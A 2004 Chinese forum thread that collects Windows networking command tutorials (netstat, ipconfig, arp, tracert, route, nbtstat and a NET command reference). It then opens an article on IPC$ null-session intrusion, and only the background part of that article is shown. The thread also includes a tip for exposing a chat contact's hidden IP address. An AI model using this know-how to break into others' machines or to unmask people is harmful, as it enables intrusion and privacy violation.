　　Datagrams Received　 = 4157136
　　No Ports　　　　　　 = 351928
　　Receive　Errors　　　 = 2
　　Datagrams Sent　　　 = 13809

　　2、Netstat的妙用

　　经常上网的人一般都使用ICQ的，不知道我们有没有被一些讨厌的人骚扰，想投诉却又不知从和下手？其实，我们只要知道对方的IP，就可以向他所属的ISP投诉了。但怎样才能通过ICQ知道对方的IP呢？如果对方在设置ICQ时选择了不显示IP地址，那我们是无法在信息栏中看到的。其实，我们只需要通过Netstat就可以很方便的做到这一点：当他通过ICQ或其他的工具与我们相连时（例如我们给他发一条ICQ信息或他给我们发一条信息），我们立刻在DOS 命令提示符下输入netstat -n或netstat -a就可以看到对方上网时所用的IP或ISP域名了，甚至连所用Port都完全暴露了。

三、IPConfig命令的使用技巧

　　IPConfig实用程序和它的等价图形用户界面----Windows 95/98中的WinIPCfg可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。但是，如果我们的计算机和所在的局域网使用了动态主机配置协议（DHCP），这个程序所显示的信息也许更加实用。这时，IPConfig可以让我们了解自己的计算机是否成功的租用到一个IP地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。

　　1、IPConfig最常用的选项

　　·ipconfig
　　当使用IPConfig时不带任何参数选项，那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值。

　　·ipconfig /all
　　当使用all选项时，IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址（MAC）。如果IP地址是从DHCP服务器租用的，IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期。

　　·ipconfig /release和ipconfig /renew
　　这是两个附加选项，只能在向DHCP服务器租用其IP地址的计算机上起作用。如果我们输入ipconfig /release，那么所有接口的租用IP地址便重新交付给DHCP服务器（归还IP地址）。如果我们输入ipconfig /renew，那么本地计算机便设法与DHCP服务器取得联系，并租用一个IP地址。请注意，大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。
　
　　下面的范例是 ipconfig /all 命令输出，该计算机配置成使用 DHCP 服务器动态配置 TCP/IP，并使用 WINS 和 DNS 服务器解析名称。

　　Windows 2000 IP Configuration
　　Node Type.. . . . . . . . : Hybrid
　　IP Routing Enabled.. . . . : No
　　WINS Proxy Enabled.. . . . : No

　　Ethernet adapter Local Area Connection:
　　Host Name.. . . . . . . . : corp1.microsoft.com
　　DNS Servers . . . . . . . : 10.1.0.200
　　Description. . . . . . . : 3Com 3C90x Ethernet Adapter
　　Physical Address. . . . . : 00-60-08-3E-46-07
　　DHCP Enabled.. . . . . . . : Yes
　　Autoconfiguration Enabled.: Yes
　　IP Address. . . . . . . . . : 192.168.0.112
　　Subnet Mask. . . . . . . . : 255.255.0.0
　　Default Gateway. . . . . . : 192.168.0.1
　　DHCP Server. . . . . . . . : 10.1.0.50
　　Primary WINS Server. . . . : 10.1.0.101
　　Secondary WINS Server. . . : 10.1.0.102
　　Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM
　　Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM
　　
　　如果我们使用的是Windows 95/98，那么我们应该更习惯使用winipcfg而不是ipconfig，因为它是一个图形用户界面，而且所显示的信息与ipconfig相同，并且也提供发布和更新动态IP地址的选项。

四、ARP（地址转换协议）的使用技巧

　　ARP是一个重要的TCP/IP协议，并且用于确定对应IP地址的网卡物理地址。实用arp命令，我们能够查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外，使用arp命令，也可以用人工方式输入静态的网卡物理/IP地址对，我们可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项作，有助于减少网络上的信息量。

　　按照缺省设置，ARP高速缓存中的项目是动态的，每当发送一个指定地点的数据报且高速缓存中不存在当前项目时，ARP便会自动添加该项目。一旦高速缓存的项目被输入，它们就已经开始走向失效状态。例如，在Windows NT/2000网络中，如果输入项目后不进一步使用，物理/IP地址对就会在2至10分钟内失效。因此，如果ARP高速缓存中项目很少或根本没有时，请不要奇怪，通过另一台计算机或路由器的ping命令即可添加。所以，需要通过arp命令查看高速缓存中的内容时，请最好先ping 此台计算机（不能是本机发送ping命令）。

　　ARP常用命令选项：

　　·arp -a或arp Cg
　　用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的，多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项，而Windows用的是arp -a（-a可被视为all，即全部的意思），但它也可以接受比较传统的-g选项。

　　·arp -a IP
　　如果我们有多个网卡，那么使用arp -a加上接口的IP地址，就可以只显示与该接口相关的ARP缓存项目。

　　·arp -s IP 物理地址
　　我们可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态，或者在出现错误时，人工配置的物理地址将自动更新该项目。

　　·arp -d IP
　　使用本命令能够人工删除一个静态项目。

　　例如我们在命令提示符下，键入 Arp Ca；如果我们使用过 Ping 命令测试并验证从这台计算机到 IP 地址为 10.0.0.99 的主机的连通性，则 ARP 缓存显示以下项：

　　Interface:10.0.0.1 on interface 0x1
　　Internet Address　　　Physical Address　　　Type
　　10.0.0.99　　　　　　 00-e0-98-00-7c-dc　　 dynamic

　　在此例中，缓存项指出位于 10.0.0.99 的远程主机解析成 00-e0-98-00-7c-dc 的媒体访问控制地址，它是在远程计算机的网卡硬件中分配的。媒体访问控制地址是计算机用于与网络上远程 TCP/IP 主机物理通讯的地址。

　　至此我们可以用ipconfig和ping命令来查看自己的网络配置并判断是否正确、可以用netstat查看别人与我们所建立的连接并找出ICQ使用者所隐藏的IP信息、可以用arp查看网卡的MAC地址。

五、Tracert、Route 与 NBTStat的使用技巧

　　1、Tracert的使用技巧　　

　　如果有网络连通性问题，可以使用 tracert 命令来检查到达的目标 IP 地址的路径并记录结果。tracert 命令显示用于将数据包从计算机传递到目标位置的一组 IP 路由器，以及每个跃点所需的时间。如果数据包不能传递到目标，tracert 命令将显示成功转发数据包的最后一个路由器。当数据报从我们的计算机经过多个网关传送到目的地时，Tracert命令可以用来跟踪数据报使用的路由（路径）。该实用程序跟踪的路径是源计算机到目的地的一条路径，不能保证或认为数据报总遵循这个路径。如果我们的配置使用DNS，那么我们常常会从所产生的应答中得到城市、地址和常见通信公司的名字。Tracert是一个运行得比较慢的命令（如果我们指定的目标地址比较远），每个路由器我们大约需要给它15秒钟。

　 Tracert的使用很简单，只需要在tracert后面跟一个IP地址或URL，Tracert会进行相应的域名转换的。

　　tracert 最常见的用法：

　　tracert IP address [-d] 该命令返回到达 IP 地址所经过的路由器列表。通过使用 -d 选项，将更快地显示路由器路径，因为 tracert 不会尝试解析路径中路由器的名称。

　　Tracert一般用来检测故障的位置，我们可以用tracert IP在哪个环节上出了问题，虽然还是没有确定是什么问题，但它已经告诉了我们问题所在的地方，我们也就可以很有把握的告诉别人----某某地方出了问题。

　　2、Route 的使用技巧

　　大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器，因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题，该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。

　　但是，当网络上拥有两个或多个路由器时，我们就不一定想只依赖缺省网关了。实际上我们可能想让我们的某些远程IP地址通过某个特定的路由器来传递，而其他的远程IP则通过另一个路由器来传递。

　　在这种情况下，我们需要相应的路由信息，这些信息储存在路由表中，每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下，必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的。

　　一般使用选项：

　　·route print
　　本命令用于显示路由表中的当前项目，在单路由器网段上的输出；由于用IP地址配置了网卡，因此所有的这些项目都是自动添加的。

　　·route add
　　使用本命令，可以将信路由项目添加给路由表。例如，如果要设定一个到目的网络209.98.32.33的路由，其间要经过5个路由器网段，首先要经过本地网络上的一个路由器，器IP为202.96.123.5，子网掩码为255.255.255.224，那么我们应该输入以下命令：

　　route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5

　　·route change
　　我们可以使用本命令来修改数据的传输路由，不过，我们不能使用本命令来改变数据的目的地。下面这个例子可以将数据的路由改到另一个路由器，它采用一条包含3个网段的更直的路径：

　　route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3

　　·route delete
　　使用本命令可以从路由表中删除路由。例如：route delete 209.98.32.33

　　3、NBTStat的使用技巧

　　使用 nbtstat 命令释放和刷新 NetBIOS 名称。NBTStat（TCP/IP上的NetBIOS统计数据）实用程序用于提供关于关于NetBIOS的统计数据。运用NetBIOS，我们可以查看本地计算机或远程计算机上的NetBIOS名字表格。

　　常用选项：

　　·nbtstat Cn
　　显示寄存在本地的名字和服务程序。

　　·nbtstat Cc
　　本命令用于显示NetBIOS名字高速缓存的内容。NetBIOS名字高速缓存用于寸放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。

　　·nbtstat Cr
　　本命令用于清除和重新加载NetBIOS名字高速缓存。

　　·nbtstat -a IP
　　通过IP显示另一台计算机的物理地址和名字列表，我们所显示的内容就像对方计算机自己运行nbtstat -n一样。

　　·nbtstat -s IP
　　显示实用其IP地址的另一台计算机的NetBIOS连接表。

　　例如我们在命令提示符下，键入：nbtstat CRR 释放和刷新过程的进度以命令行输出的形式显示。该信息表明当前注册在该计算机的 WINS 中的所有本地 NetBIOS 名称是否已经使用 WINS 服务器释放和续订了注册。

---

作者: saliva    时间: 2004-6-11 22:14
NET命令详解
许多 Windows NT 网络命令以 net 开始。这些 net 命令有一些公共属性：
通过键入 net /? 可查阅所有可用的 net 命令。
通过键入 net help 命令可在命令行中获得 net 命令的语法帮助。例如，要得到 net acco
unts 命令的帮助，请键入 net help accounts。
所有 net 命令接受选项 / yes 和 /no（可缩写为 / y 和 /n ）。/ y 对命令产生的任何交
互提示自动回答“是”，/n 回答“否”。例如，net stop server 通常提示确认是否根据服
务器服务结束所有服务，net stop server /y 自动回答“是”并关闭服务器服务。

Net Accounts

更新用户帐号数据库、更改密码及所有帐号的登录要求。必须要在更改帐号参数的计算机上
运行网络登录服务。
net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days |
unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
net accounts [/sync] [/domain]
参数
无
键入不带参数的 net accounts，将显示当前密码设置、登录时限及域信息。
/forcelogoff:{minutes | no}
设置当用户帐号或有效登录时间过期时，结束用户和服务器会话前的等待时间。no 选项禁止
强行注销。该参数的默认设置为 no。
指定 /forcelogoff:minutes 之后，Windows NT 在其强制用户退出网络 minutes 分钟之前
，将给用户发出警报。如果还有打开的文件，Windows NT 将警告用户。如果 minutes 小于
两分钟，Windows NT 警告用户立即从网络注销。
/minpwlen:length
设置用户帐号密码的最少字符数。允许范围是 0-14，默认值为 6。
/maxpwage:{days | unlimited}
设置用户帐号密码有效的最大天数。unlimited 不设置最大天数。/maxpwage 选项的天数必
须大于 /minpwage。允许范围是 1-49,710 天 (unlimited)。默认值为 90 天。
/minpwage:days
设置用户必须保持原密码的最小天数。 0 值不设置最小时间。允许范围是 0-49,710 天，默
认值为 0 天。
/uniquepw:number
要求用户更改密码时，必须在经过 number 次后，才能重复使用与之相同的密码。允许范围
是 0-8。默认值为 5。
/domain
在当前域的主域控制器上执行该操作。否则只在本地计算机执行操作。
该参数仅用于 Windows NT Server 域中的 Windows NT Workstation 计算机，Windows NT
Server 计算机默认为在主域控制器执行操作。
/sync
当用于主域控制器时，该命令使域中所有备份域控制器同步；当用于备份域控制器时，该命
令仅使该备份域控制器与主域控制器同步。该命令仅适用于 Windows NT Server 域成员的计
算机。

Net Computer

从域数据库中添加或删除计算机。该命令仅在运行 Windows NT Server 的计算机上可用。
net computer \computername {/add | /del}
参数
\computername
指定要添加到域或从域中删除的计算机。
/add
将指定计算机添加到域。
/del
将指定计算机从域中删除。

Net Config

显示当前运行的可配置服务，或显示并更改某项服务的设置。
net config [service [options]]
参数
无
键入不带参数的 net config 将显示可配置服务的列表。
service
通过 net config 命令进行配置的服务（server 或 workstation）。
options
服务的特定选项。完整语法请参阅 net config server 或 net config workstation。

Net Config Server

运行服务时显示或更改服务器的服务设置。
net config server [/autodisconnect:time] [/srvcomment:"text "] [/hidden:{yes | n
o}]
参数
无
键入不带参数的 net config server，将显示服务器服务的当前配置。
/autodisconnect:time
设置断开前用户会话闲置的最大时间值。可以指定 -1，表示永不断开连接。允许范围是 -1
-65535 分钟，默认值是 15 分钟。
/srvcomment:"text "
为服务器添加注释，可以通过 net view 命令在屏幕上显示所加注释。注释最多可达 48 个
字符，文字要用引号引住。
/hidden:{yes | no}
指定服务器的计算机名是否出现在服务器列表中。请注意隐含某个服务器并不改变该服务器
的权限。默认为 no。

Net Config Workstation

服务运行时，显示或更改工作站各项服务的设置。
net config workstation [/charcount:bytes] [/chartime:msec] [/charwait:sec]
参数
无
键入不带参数的 net config workstation 将显示本地计算机的当前配置。
/charcount:bytes
指定 Windows NT 在将数据发送到通讯设备之前收集的数据量。如果同时设置 /chartime:m
sec 参数，Windows NT 按首先满足条件的选项运行。允许范围是 0-65535 字节，默认值是
16 字节。
/chartime:msec
指定 Windows NT 在将数据发送到通讯设备之前收集数据的时间。如果同时设置 /charcoun
t:bytes 参数，Windows NT 按首先满足条件的选项运行。允许范围是 0-65535000 毫秒，默
认值是 250 毫秒。
/charwait:sec
设置 Windows NT 等待通讯设备变为可用的时间。允许的范围是 0-65535 秒，默认值是 36
00 秒。

Net Continue

重新激活挂起的服务。
net continue service
参数
service
能够继续运行的服务，包括： file server for macintosh（该服务仅限于 Windows NT Se
rver）, ftp publishing service, lpdsvc, net logon, network dde，network dde dsdm
，nt lm security support provider，remoteboot（该服务仅限于 Windows NT Server），
remote access server, schedule，server，simple tcp/ip services 及 workstation 。


Net File

显示某服务器上所有打开的共享文件名及锁定文件数。该命令也可以关闭个别文件并取消文
件锁定。
net file [id [/close]]
参数
无
键入不带参数的 net file 可获得服务器上打开文件的列表。
id
文件标识号。
/close
关闭打开的文件并释放锁定记录。请从共享文件的服务器中键入该命令。

Net Group

在 Windows NT Server 域中添加、显示或更改全局组。该命令仅在 Windows NT Server 域
中可用。
net group [groupname [/comment:"text "]] [/domain]
net group groupname {/add [/comment:"text "] | /delete} [/domain]
net group groupname username [ ...] {/add | /delete} [/domain]
参数
无
键入不带参数的 net group 可以显示服务器名称及服务器的组名称。
groupname
要添加、扩展或删除的组。仅提供某个组名便可查看组中的用户列表。
/comment:"text "
为新建组或现有组添加注释。注释最多可以是 48 个字符，并用引号将注释文字引住。
/domain
在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作。
该参数仅用于作为 Windows NT Server 域成员的 Windows NT Workstation 计算机。Windo
ws NT Server 计算机默认为在主域控制器中操作。
username[ ...]
列表显示要添加到组或从组中删除的一个或多个用户。使用空格分隔多个用户名称项。
/add
添加组或在组中添加用户名。必须使用该命令为添加到组中的用户建立帐号。
/delete
删除组或从组中删除用户名。

Net Help

提供网络命令列表及帮助主题，或提供指定命令或主题的帮助。可用网络命令列于 N 下面的
“命令参考”中“命令”窗口内。
net help [command]
net command {/help | /?}
参数
无
键入不带参数的 net help 显示能够获得帮助的命令列表和帮助主题。
command
需要其帮助的命令，不要将 net 作为 command 的一部分。
/help
提供显示帮助文本方式选择。
/?
显示命令的正确语法。

Net Helpmsg

提供 Windows NT 错误信息的帮助。
net helpmsg message#
参数
message#
需要其帮助的 Windows NT 消息的四位代码。

Net Localgroup

添加、显示或更改本地组。
net localgroup [groupname [/comment:"text "]] [/domain]
net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
net localgroup groupname name [ ...] {/add | /delete} [/domain]
参数
无
键入不带参数的 net localgroup 将显示服务器名称和计算机的本地组名称。
groupname
要添加、扩充或删除的本地组名称。只提供 groupname 即可查看用户列表或本地组中的全局
组。
/comment: "text "
为新建或现有组添加注释。注释文字的最大长度是 48 个字符，并用引号引住。
/domain
在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作。
该参数仅应用于 Windows NT Server 域中的 Windows NT Workstation 计算机。Windows N
T Server 计算机默认为在主域控制器中操作。
name [ ...]
列出要添加到本地组或从本地组中删除的一个或多个用户名或组名，多个用户名或组名之间
以空格分隔。可以是本地用户、其他域用户或全局组，但不能是其他本地组。如果是其他域
的用户，要在用户名前加域名（例如，SALESRALPHR）。
/add
将全局组名或用户名添加到本地组中。在使用该命令将用户或全局组添加到本地组之前，必
须为其建立帐号。
/delete
从本地组中删除组名或用户名。

Net Name

添加或删除消息名（有时也称别名），或显示计算机接收消息的名称列表。要使用 net nam
e 命令，计算机中必须运行信使服务。
net name [name [/add | /delete]]
参数
无
键入不带参数的 net name 将列出当前使用的名称。
name
指定接收消息的名称。名称最多为 15 个字符。
/add
将名称添加到计算机中。 /add 是可选项，键入 net name name 与键入 net name name /a
dd 相同。
/delete
从计算机中删除名称。

Net Pause

暂停正在运行的服务。
net pause service
参数
service
指下列服务： file server for macintosh（仅限于 Windows NT Server）、ftp publishi
ng service、lpdsvc、net logon、network dde、network dde dsdm、nt lm security sup
port provider、remoteboot（仅限于 Windows NT Server）、remote access server、sch
edule、server、simple tcp/ip services 或 workstation 。

Net Print

显示或控制打印作业及打印队列。
net print \computername sharename
net print [\computername ] job# [/hold | /release | /delete]
参数
computername
共享打印机队列的计算机名。
sharename
打印队列名称。当包含 computername 与 sharename 时，使用反斜杠 () 将它们分开。
job#
在打印机队列中分配给打印作业的标识号。有一个或多个打印机队列的计算机为每个打印作
业分配唯一标识号。如果某个作业号用于共享打印机队列中，则不能指定给其他作业，也不
能分配给其他打印机队列中的作业。
/hold
使用 job# 时，在打印机队列中使打印作业等待。打印作业停留在打印机队列中，并且其他
打印作业只能等到释放该作业之后才能进入。
/release
释放保留的打印作业。
/delete
从打印机队列中删除打印作业。

Net Send

向网络的其他用户、计算机或通信名发送消息。要接收消息必须运行信使服务。
net send {name | * | /domain[:name] | /users} message
参数
name
要接收发送消息的用户名、计算机名或通信名。如果计算机名包含空字符，则要将其用引号
(" ") 引住。
*
将消息发送到组中所有名称。
/domain[:name]
将消息发送到计算机域中的所有名称。如果指定 name，则消息将发送到指定域或组中的所有
名称。
/users
将消息发送到与服务器连接的所有用户。
message
作为消息发送的文本。

Net Session

列出或断开本地计算机和与之连接的客户端的会话。
net session [\computername] [/delete]
参数
无
键入不带参数的 net session 可以显示所有与本地计算机的会话的信息。
\computername
标识要列出或断开会话的计算机。
/delete
结束与 \computername 计算机会话并关闭本次会话期间计算机的所有打开文件。如果省略
\computername 参数，将取消与本地计算机的所有会话。

Net Share

创建、删除或显示共享资源。
net share sharename
net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
net share sharename [/users:number | unlimited] [/remark:"text"]
net share {sharename | drive:path} /delete
参数
无
键入不带参数的 net share 将显示本地计算机上所有共享资源的信息。
sharename
是共享资源的网络名称。键入带 sharename 的 net share 命令，只显示该共享信息。
drive:path
指定共享目录的绝对路径。
/users:number
设置可同时访问共享资源的最大用户数。
/unlimited
不限制同时访问共享资源的用户数。
/remark:"text "
添加关于资源的注释，注释文字用引号引住。
/delete
停止共享资源。

Net Start

启动服务，或显示已启动服务的列表。如果服务名是两个或两个以上的词，如 Net Logon 或
Computer Browser，则必须用引号 (") 引住。.
net start [service]
参数
无
键入不带参数的 net start 则显示运行服务的列表。
service
包括下列服务： alerter、client service for netware、clipbook server、computer br
owser、dhcp client 、directory replicator 、eventlog 、ftp publishing service 、
lpdsvc、messenger 、net logon 、network dde 、network dde dsdm 、network monitor
ing agent 、nt lm security support provider 、ole 、remote access connection man
ager 、remote access isnsap service 、remote access server 、remote procedure ca
ll (rpc) locator 、remote procedure call (rpc) service 、schedule 、server 、sim
ple tcp/ip services 、snmp、spooler 、tcp/ip netbios helper 、ups 及 workstation
。
下列服务仅在 Windows NT Server 下可用：file server for macintosh、gateway servic
e for netware、microsoft dhcp server、print server for macintosh、remoteboot、wi
ndows internet name service 。

Net Statistics

显示本地工作站或服务器服务的统计记录。
net statistics [workstation | server]
参数
无
键入不带参数的 net statistics 将列出其统计信息可用的运行服务。
workstation
显示本地工作站服务的统计信息。
server
显示本地服务器服务的统计信息。

Net Stop

停止 Windows NT 网络服务。
net stop service
参数
service
包括下列服务： alerter（警报）、client service for netware（Netware 客户端服务）
、clipbook server（剪贴簿服务器）、computer browser（计算机浏览器）、directory r
eplicator（目录复制器）、ftp publishing service (ftp )（ftp 发行服务）、lpdsvc、
messenger（信使）、net logon（网络登录）、network dde（网络 dde）、network dde d
sdm（网络 dde dsdm）、network monitor agent（网络监控代理）、nt lm security supp
ort provider（NT LM 安全性支持提供）、ole（对象链接与嵌入）、remote access conne
ction manager（远程访问连接管理器）、remote access isnsap service（远程访问 isns
ap 服务）、remote access server（远程访问服务器）、remote procedure call (rpc) l
ocator（远程过程调用定位器）、remote procedure call (rpc) service（远程过程调用服
务）、schedule（调度）、server（服务器）、simple tcp/ip services（简单 TCP/IP 服
务）、snmp、spooler（后台打印程序）、tcp/ip netbios helper（TCP/IP NETBIOS 辅助工
具）、ups 及 workstation（工作站）。
下列服务仅在 Windows NT Server 中可用： file server for macintosh、gateway servi
ce for netware、microsoft dhcp server、print server for macintosh、remoteboot、w
indows internet name service。

Net Time

使计算机的时钟与另一台计算机或域的时间同步。不带 /set 参数使用时，将显示另一台计
算机或域的时间。
net time [\computername | /domain[:name]] [/set]
参数
\computername
要检查或同步的服务器名。
/domain[:name]
指定要与其时间同步的域。
/set
使本计算机时钟与指定计算机或域的时钟同步。

Net Use

连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。该命令也控制永久
网络连接。
net use [devicename | *] [\computernamesharename[volume]] [password | *]] [/user
:[domainname]username] [[/delete] | [/persistent:{yes | no}]]
net use devicename [/home[password | *]] [/delete:{yes | no}]
net use [/persistent:{yes | no}]
参数
无
键入不带参数的 net use 将列出网络连接。
devicename
指定要连接到的资源名称或要断开的设备名称。有两类设备名：磁盘驱动器（D: 到 Z:）和
打印机（LPT1: 到 LPT3）。若键入星号而不是指定设备名将分配下一个可用设备名。
\computernamesharename
服务器及共享资源的名称。如果计算机名包含空白字符，要用引号 (" ") 将双反斜线及计算
机名引住。计算机名长度可以是 1-15 个字符。
volume
指定服务器上的 NetWare 卷。要连接到 NetWare 服务器，必须安装并运行 NetWare 客户机
服务 (Windows NT Workstation) 或 NetWare 网关服务 (Windows NT Server)。
password
访问共享资源的密码。
*
提示键入密码。在密码提示行中键入密码时，将不显示该密码。
/user
指定进行连接的另外一个用户。
domainname
指定另一个域。例如 net use d: \servershare /user:adminmariel 连接用户 mariel，如
同从 admin 域连接一样。如果省略域，将使用当前登录域。
username
指定登录的用户名。
/home
将用户连接到其宿主目录。
/delete
取消指定网络连接。如果用户以星号指定连接，则取消所有网络连接。
/persistent
控制永久网络连接的使用。默认为上次使用的设置。无设备的连接不是永久的。
yes
保存建立的所有连接，并在下次登录时还原。
no
不保存建立的连接和继发连接，并在下次登录时还原现有连接。使用 /delete 开关项取消永
久连接。

Net User

添加或更改用户帐号或显示用户帐号信息。
net user [username [password | *] [options]] [/domain]
net user username {password | *} /add [options] [/domain]
net user username [/delete] [/domain]
参数
无
键入不带参数的 net user 将查看计算机上的用户帐号列表。
username
添加、删除、更改或查看用户帐号名。用户帐号名最多可以有 20 个字符。
password
为用户帐号分配或更改密码。密码必须满足在 net accounts 命令 /minpwlen 选项中设置的
最小参数。最多是 14 个字符。
*
提示输入密码。在密码提示行中键入密码时，将不显示该密码。
/domain
在计算机主域的主域控制器中执行操作。
该参数仅在 Windows NT Server 域成员的 Windows NT Workstation 计算机上可用。默认情
况下，Windows NT Server 计算机在主域控制器中执行操作。
注意：在计算机主域的主域控制器发生该动作。它可能不是登录域。
/add
将用户帐号添加到用户帐号数据库。
/delete
从用户帐号数据库中删除用户帐号。
选项如下所示：
/active:{no | yes}
启用或禁止用户帐号。如果不激活用户帐号，用户就不能访问计算机上的资源。默认值是 y
es （激活）。
/comment:"text"
提供用户帐号的注释。该注释最多可以有 48 个字符，文字用引号引住。
/countrycode:nnn
使用操作系统的国家代码以便为用户帮助和错误信息文件提供指定语言文件。0 值表示默认
国家代码。
/expires:{date | never}
如果设置 date，将导致用户帐号过期，never 不对用户帐号设置时间限制。过期日期根据
/countrycode 值可以是下列格式： mm/dd/yy、dd/mm/yy 或 mmm, dd, yy。注意帐号在指定
日期开始时过期。月份可以是数字、全名或三个字母的简拼。年可以是两位或四位数，使用
逗号或斜线（不要用空格） 区分日期的各部分。如果省略 yy ，则使用该日期下一次到来的
年份（根据计算机的时钟）。例如如果在 1994 年 1 月 10 日到 1995 年 1 月 8 日之间输
入下列日期项，那它们相同：jan,9
1/9/95
january,9,1995
1/9
/fullname:"name"
指定用户全名而不是用户名。用引号将名字引住。
/homedir:path
设置用户宿主目录的路径。该路径必须存在。
/homedirreq:{yes | no}
设置是否需要宿主目录。
/passwordchg:{yes | no}
指定用户是否能改变自己的密码。默认值是 yes。
/passwordreq:{yes | no}
指定用户帐号是否需要密码，默认值是 yes。
/profilepath:[path]
设置用户登录配置文件的路径。该路径名指向注册表配置文件。
/scriptpath:path
为用户登录脚本设置路径。Path 不能是绝对路径；
path 是相对于 %systemroot%SYSTEM32REPLIMPORTSCRIPTS 的相对路径：。
/times:{times | all}
指定允许用户使用计算机的时间。times 值表示为 day[-day][, day[-day]] , time[-time
][, time[-time]], 增量限制为一小时。Days 可以是全名或简写（M、T、W、Th、F、Sa、S
u）。Hours 可以是 12 小时制或 24 小时制。对于 12 小时值，使用 AM、PM 或 A.M、P.M
。all 表示用户总可以登录。空值表示用户永远不能登录。用逗号分隔日期和时间，分隔时
间和日期的单位用分号（例如 M,4AM-5PM; T,1PM-3PM）。指定 /times 时不要使用空格。
/usercomment:"text "
让管理员添加或更改帐号的“用户注释”。用引号引住文字。
/workstations:{computername[,...] | *}
列出最多八个用户可以登录到网络的工作站。用逗号分隔列表中的多个项。如果 /workstat
ions 没有列表，或如果列表是星号“*”，则用户可以从任何一台计算机登录。

Net View

显示域列表、计算机列表或指定计算机的共享资源列表。
net view [\computername | /domain[:domainname]]
net view /network:nw [\computername]
参数
无
键入不带参数的 net view 将显示当前域的计算机列表。
\computername
指定要查看其共享资源的计算机。
/domain[:domainname]
指定要查看其可用计算机的域。如果省略 domainname ，则显示网络的所有域。
/network:nw
显示 NetWare 网络中所有可用的服务器。如果指定计算机名，则显示 NetWare 网络中该计
算机的可用资源。也可以用此开关指定添加到系统中的其他网络。

---

作者: xlc123    时间: 2004-6-11 22:16
ipc$详解
目录 ：

一 前言
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$连接所使用的端口
六 ipc$连接在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 如何打开目标的IPC$共享以及其他共享
十 一些需要shell才能完成的命令
十一 入侵中可能会用到的相关命令
十二 ipc$完整入侵步骤祥解
十三 如何防范ipc$入侵
十四 ipc$入侵问答精选
十五 结束的话



一 前言

网上关于ipc$入侵的文章可谓多如牛毛，而且也不乏优秀之作，攻击步骤甚至可以说已经成为经典的模式，因此也没人愿意再把这已经成为定式的东西拿出来摆弄。
不过话虽这样说，但我个人认为这些文章讲解的并不详细，对于第一次接触ipc$的菜鸟来说，简单的罗列步骤并不能解答他们的种种迷惑（你随便找一个hack论坛搜一下ipc$，看看存在的疑惑有多少）。因此我参考了网上的一些资料，教程以及论坛帖子，写了这篇总结性质的文章，想把一些容易混淆，容易迷惑人的问题说清楚，让大家不要总徘徊在原地!
注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列，而鉴于win Xp在安全设置上有所提高，个别操作并不适用，有机会将单独讨论。


二 什么是ipc$


IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。那么什么是空会话呢？


三 什么是空会话


在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：
1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建
立；
2）服务器产生一个随机的64位数（实现挑战）传送回客户；
3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结
果返回到服务器（实现响应）；
4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程，那么空会话又如何呢？

